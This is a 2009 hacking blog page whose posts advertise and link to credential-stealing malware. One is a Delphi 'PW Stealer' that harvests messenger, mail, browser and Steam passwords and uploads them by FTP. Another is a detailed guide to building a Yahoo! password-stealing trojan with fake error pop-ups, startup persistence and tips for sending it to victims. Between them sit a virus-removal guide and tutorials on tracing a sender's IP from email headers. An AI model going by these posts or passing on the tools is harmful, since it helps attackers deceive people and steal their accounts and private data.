Showing posts with label YAHOO. Show all posts
Messenger PASSWORD STEALER !
Thursday, October 8, 2009
Coder: c4!N
Compiler: Delphi
testet : Windows XP SP2
Source-Protector: Themida
Description: The UnLimited PW Stealer is a high-quality PW Stealer with the following characteristics:
hack the following accounts:
PW Messanger Packet
MSN Messenger
Windows Messenger
Yahoo Messenger Google Talk
ICQ Lite
AOL Instand Messenger/Netscape 7
Trilian
Miranda
GAIM
PW Mail Packet
Outlook Express
Microsoft Outlook 2000/XP/2003
IncrediMail
Mozilla Thunderbird
Netscape
Group Mail Free, Gmail
Yahoo Mail
Hotmail / MSN Mail
Eudora
Protected Storage PW Packet
Outlook Passwords
Auto Completet password in IE
Password protected sites in IE
MSN Explorer Passwords
Steam PW Packet
Steam Username
Steam Password
Steam game-path
Game Key Stealer
UT 2003/2004
Battlefield 1942 / Road to Rome / Scret Weapons / Vietnam
Need for Speed Hot Pursuit 2
James Bond 007 Nightfire
Command & Conquer Generals / Zero Hour
SimCity 4
Call of Duty 2 / United Offensive / 1
SWAT 4 / EXP
Windows Info Packet
Windows Username, Windows Computername ect. ect.
Other options are:
FTP Upload Information
Crypt the ploadfile PW Files
Crypt the FTP Settings
Melt Server (Self-Delete after Execute)
File Attribut on hidden set
Icon Changer
UPX Packer
and many more Smiley
UnLimited_PW_-_Stealer_0.40.rar
Description:
Download
Filename: UnLimited_PW_-_Stealer_0.40_amaR.zip
Your security stuff may detect it as a security risk.
File Size: 4.40 MB
Download Here
Posted in HACKS, YAHOO by Taufin Ahmed | 0 comments
Email this postCure the most deadiest Messenger VIRUS
This Yahoo messenger virus attack is one of the most powerful Trojan/virus.. If your computer is infected with this virus; It will sends the nsl-school.org url to all of your friend list in yahoo messenger using your ID . So with in few hours many of your friends will get infected with it.
To solve this problem, Just go through the below steps carefully.
What are those links ?:
Nsl-school.org or other (Do not open this url in your browser).
IPB Image
If you are infected with it what is going to happen ?
1:
It sets your default IE page to nsl-school.org, you can't even change it back to other page. If you open IE from your comp some malicious code will automatically executed into your computer.
2: It will disables the Task manager / reg edit. So you can't kill the Trojan process anymore.
3:
Files that are gonaa installed by this virus are svhost.exe , svhost32.exe , internat.exe.
You can find these files in windows/ & temp/ directories.
4: It will sends the secured & protected information to attacker
How to remove this manually from your computer ?
1: Close the IE browser. Log out messenger / Remove Internet Cable.
2: To enable Regedit
Click Start, Run and type this command exactly as given below: (better - Copy and paste)
Code: REG add HKCUSoftwareMic*ftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 0 /f
3: To enable task manager : (To kill the process we need to enable task manager)
Click Start, Run and type this command exactly as given below: (better - Copy and paste)
Code: REG add HKCUSoftwareMic*ftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 0 /f
4: Now we need to change the default page of IE though regedit.
Start>Run>Regedit
From the below locations in Regedit chage your default home page to hackgyan.com or other
Code: HKEY_CURRENT_USERSOFTWAREMic*ftInternet ExplorerMain
HKEY_ LOCAL_MACHINESOFTWAREMic*ftInternet ExplorerMain
HKEY_USERSDefaultSoftwareMic*ftInternet ExplorerMain
Just replace the attacker site with hackgyan.com or set it to blank page.
5:
Now we need to kill the process from back end. For this, Press "Ctrl + Alt + Del"
Kill the process svhost32.exe . ( may be more than one process is running.. check properly)
6:
Delete svhost32.exe , svhost.exe files from Windows/ & temp/ directories. Or just search for svhost in your comp.. delete those files.
7: Go to regedit search for svhost and delete all the results you get
Code: Start>Run>Regedit
8: Restart the computer. That's it now your system is virus free
Posted in Tips and Tricks, YAHOO by Taufin Ahmed | 0 comments
Email this postFind MAIL SENDERs IP
Emails are very important part of our communication system
We think that we know everything about emails
we know how to compose email , how to attach a file , how to send it to others ,How to receive emails from others and many other things.This is all we know about emails.But this is not end of it .When you receive or send emails many other things are sent with it.
At this time when Email is progressively used for business and for many purposes, not to mention it is being used for phishing and other malicious intentions. It is of utmost priority to understand the other "messages" besides what has been sent or received by you.
Every email comes with a “Header” which is one part of an e-mail structure; call it DNA of the mail. It carries the basic fundamental information such as from whom the email comes, to whom it is addressed, date/time it was sent and the subject of the email. It is similar to an electronic postSeptemberk. Moreover, it also carries other detailed information which we usually don’t see.
This basic information comes in all brief/basic headers that most email programs automatically shows. This detail technical information can be viewed in a full header. All email programs can be set to show only brief header or full header and it is up to the users to set the program whether to view only “brief header” or “full header”.
Full header carries the information of the mail server’s name that the email passed through on its way to the recipient, and sender's IP address and even the name of the email program and its version used.
Knowledge of this information is essential for analysis and investigation purposes on cases involving email abuse, spamming, harassment, forgeries and mail-bombing. It is worth mentioning, understanding of this tool would definitely help people to counter these attacks, and save themselves from unwarranted consequences. Well, this information could not be found in a brief header.
Here we will take the case of Google mail and Yahoo mail to find out the full header.
Google Mail.
Using your id/password, login to Gmail. Open the mail for which you wish to find the full header of the sender. Click on the inverted triangle placed just next to Reply.
You will get something like this…
Delivered-To: Mr.x@gmail.com
Received: by 10.36.81.3 with SMTP id e3cs239nzb; Tue, 12 September:11:47 -0800 (PST)
Return-Path:
Received: from mail.emailprovider.com (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si826631rnb.2007.03.12.15.11.46; Tue, 12 September:11:47 -0800 (PST)
Message-ID: <20070312231145.62086.mail@mail.emailprovider.com>
Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12 September:11:45 PST
Date: Tue, 12 September:11:45 -0800 (PST)
From: Mr.y
Subject: Hello
To: Mr.x
In the example, headers are added to the message three times:
1. When Mr.y composes the email
Date: Tue, 12 September:11:45 -0800 (PST)
From: Mr .y
Subject: Hello
To: Mr.x
2. When the email is sent through the servers of Mr.y's email provider, mail.emailprovider.com
Message-ID: <20070312231145.62086.mail@mail.emailprovider.com>
Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12 September:11:45 PST
3.When the message transfers from Mr.y 's email provider to Mr. x's Gmail account
Delivered-To: Mr.x@gmail.com
Received: by 10.36.81.3 with SMTP id e3cs239nzb;Tue, 12 September:11:47 -0800 (PST)
Return-Path: Mr.y@emailprovider.com
Received: from mail.emailprovider.com (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si826631rnb; Tue, 12 September:11:47 -0800 (PST)
Below is a description of each section of the email header:
Delivered-To: Mr.x@gmail.com
The email address the message will be delivered to.
Received: by 10.36.81.3 with SMTP id e3cs239nzb;
Tue, 29 Mar:11:47 -0800 (PST)
The time the message reached Gmail's servers.
Return-Path:
The address from which the message was sent.
Received: from mail.emailprovider.com
(mail.emailprovider.com [111.111.11.111])
by mx.gmail.com with SMTP id h19si826631rnb.2005.03.29.15.11.46;
Tue, 29 Mar:11:47 -0800 (PST)
The message was received from mail.emailprovider.com, by a Gmail server on March 29, 2005 at approximately 3 pm.
Message-ID:.62086.mail@mail.emailprovider.com
A unique number assigned by mail.emailprovider.com to identify the message.
Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 29 Mar:11:45 PST
Mr.y used an email composition program to write the message, and it was then received by the email servers of mail.emailprovider.com.
Date: Tue, 29 Mar:11:45 -0800 (PST)
From: Mr y
Subject: Hello
To: Mr.x
The date, sender, subject, and destination -- Mr. Jones entered this information (except for the date) when he composed the email.
And for IP, look for Received:from followed by the IP within square brackets [ ] e.g.
Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12
Also importantly, there are times when you might find multiple Received: from entries, in that case, please select the last one as the valid choice.
Posted in HACKS, IP, YAHOO by Taufin Ahmed | 0 comments
Email this postSome more ways to find IP of mail senders
When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The Tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.
First of all, the IP address is generally found in the headers enclosed between square brackets, for instance, [129.130.1.1]
Finding IP address in Gmail
* Log into your Gmail account with your username and password.
* Open the mail.
* To display the email headers,
* Click on the inverted triangle beside Reply. Select Show Original.
* Manually find the IP address, proceed to 5.
* Look for Received: from followed by the IP address between square brackets [ ].
Received: from [69.138.30.1] by web4587.mail.***.yahoo.com
* If you find more than one Received: from patterns, select the last one.
* Track the IP address of the sender
Finding IP address in Yahoo! Mail
* Log into your Yahoo! mail with your username and password.
* Click on Inbox or whichever folder you have stored your mail.
* Open the mail.
* If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
* You should see similar headers like above
Or if you want to manually find the IP address, proceed to 6.
* Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.
That is be the IP address of the sender.
If there are many instances of Received: from with the IP address, select the IP address in the last pattern. If there are no instances of Received: from with the IP address, select the first IP address in X-Originating-IP.
* Track the IP addess of sender
Finding IP address in Hotmail
* Log into your Hotmail account with your username and password.
* Click on the Mail tab on the top.
* Open the mail.
* If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
* You should see the email headers now.
* Manually find the IP address, proceed to 7.
* If you find a header with X-Originating-IP: followed by an IP address, that is the senders IP address
Hotmail headers
In this case the IP address of the sender is [68.34.60.59].
* If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers
Look for Received: from followed by IP address within square brackets[]
In this case, the IP address of the sender is [69.140.7.58].
* Or else if you have headers like this
Hotmail headers
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] (Spam mail).
* If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
* Track the IP address of the sender
Posted in IP, Tips and Tricks, YAHOO by Taufin Ahmed | 0 comments
Email this postHack YAHOO ! ID
Tuesday, October 6, 2009
FOR THE BEGINNERS
This program (picture above) is a builder which is Used to create a server. When that server is opened it will send out the Yahoo! password (Of the person who opened it) by Instant Message to the Yahoo! ID entered in the builder.
What’s a server? a server is a program that will run hidden and pretend to be something its not. In this case the server is a Yahoo! messenger password stealer, get the idea? so using Y! Jacked builder you can make your server appear to be a real program (using the options) to make the victim(s) less suspicious.
OPTIONS...
FAKE POP UP MESSAGE
If you decide to enable this option a fake pop up message will be shown when your server is opened. You can change the title and message by typing into the text box's, you can change the pop up type by clicking on the images next to the title and message textboxes, you can change the buttons of the pop up with the drop down menu next to the test button. Also, you see the list box with $CN, $YI etc... in it? they are called variables and can be added into your title or message; lets say you put the title "Error with $CN" when the server is opened and the pop up appears the victim will see the title "error with COMPUTER NAME" (computer name = the name of their computer). With all these options you can make a victim believe there’s a real error or something with the program they just opened (your server!). Mess around with the options and changing title, msg, etc... and click test to see what the pop up will look like.
ICON
The icon you select by clicking will be the icon your server has when you click create.
OPTIONS
Add to sys start up: If you check this your server will install itself to run with the system (after reboots etc..). If you DONT check this option your server will no longer work after the victim restarts his/her computer!
Send clipboard txt: If you check this you will be sent the victims clipboard text (text copied in right click>copy).
Send comp name: If you check this you will be sent the victims computer name.
Send comp U name: If you check this you will be sent the victims computer username.
Send Y! login time: If you check this you will be sent the time the victim logged into Yahoo.
Send home page: If you check this you will be sent the victims home page.
Delete self on load: If you check this your server will delete itself when its opened, server copies elsewhere so dont worry.
IMPORTANT!!!!
You MUST put your Yahoo! ID in the builder!!! otherwise you wont get any of your victims passwords or information!!!
I reccommend making a new Y! ID that you use in the builder because it can get annoying (All the IM's), then just login the ID and the passwords will be in offline messages.
Enter a name for your server
When your server is created it's name will be whatever you put in this textbox.
Server extension
Your server has to be a executable file otherwise it wont work, I would stick with .exe but you can use .scr just dont be suprised if it doenst work on everyone using .scr!
F.A.Q
Question: How do I send my server to people?
Answer: Its just a file like any other so send it like any other file, email, chat client Send File, etc...
Question: I sent the file but didnt get a password, why?
Answer: Either the victim didnt even open the file or they dont have Yahoo! messenger, or... they did open it but have not yet logged into yahoo.
Question: I opened it on myself and cant remove it, how do i remove it from my computer?
Answer: **** off, told you not to open it when you clicked create.
Question: Will the victim see the IM being sent to me with their password?
Answer: No. It's all done hidden.
Question: Will the message sent to me with the victims password be stored in their message archive?
Answer: No.
Question: Can I rename the server?
Answer: Not recommended after creation, choose the name you want before you click build.
Question: Can I rename send my server to more than one person?
Answer: Yes. You can send the same server to anyone you want, no need to keep making servers unless you want to change options.
Question: I'm getting pissed off with all the IM's! can I cancel the server from working?
Answer: No you cant unless the person removes it or uninstalls Yahoo! This is why I said to make another Yahoo! ID for your passwords to be sent too.
Download Here
http://rs31gc.rapidshare.com/files/132984189/12440130/Y__Jacked_2_.rar
Posted in HACKS, YAHOO by Taufin Ahmed | 0 comments
Email this post
Subscribe to:
Posts (Atom)